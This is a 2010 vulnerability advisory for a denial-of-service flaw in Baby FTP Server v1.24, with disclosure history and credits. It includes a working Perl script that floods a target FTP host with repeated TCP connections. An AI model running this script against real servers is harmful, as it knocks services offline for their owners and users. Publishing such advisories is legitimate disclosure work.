[DCA-0004] Baby FTP Server DoS

2010-08-14T00:00:00
ID SECURITYVULNS:DOC:24497
Type securityvulns
Reporter Securityvulns
Modified 2010-08-14T00:00:00

Description

[DCA-0004]

[Software]

  • Baby FTP Server

[Vendor Product Description]

  • Baby FTP server has only the most necessary features and is yet powerful enough to be a basis for a more complex server

[Bug Description]

  • The FTP Server can't handle multiple/simultaneous connections leading to Denial-of-Service

[History]

  • Advisory sent to vendor on 06/14/2010.
  • No response from vendor
  • Public advisory & exploit 08/02/2010.

[Impact]

  • Low

[Affected Version]

  • Baby FTP Server v1.24
  • Prior versions may also be vulnerable

[Code]

!/usr/bin/perl

use IO::Socket;

    if (@ARGV < 1) {
            usage();
    }

    $ip     = $ARGV[0];
    $port   = $ARGV[1];
    $conn   = $ARGV[2];

    $num    = 0;

    print "[+] Sending request...\n";

    while ( $num <= $conn ) {
            system("echo -n .");
            $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>

"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";

    close($s);
    $num++;
    }

    print "\n[+] Done!\n";

sub usage() { print "[-] Usage: <". $0 ."> <host> <port> <num-conn>\n"; print "[-] Example: ". $0 ." 127.0.0.1 21 1200\n"; exit; }

[Credits]

Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br

[Greetz] Crash and all Dclabs members.

-- Rodrigo Escobar (ipax) Pentester/Researcher Security Team @ DcLabs http://www.dclabs.com.br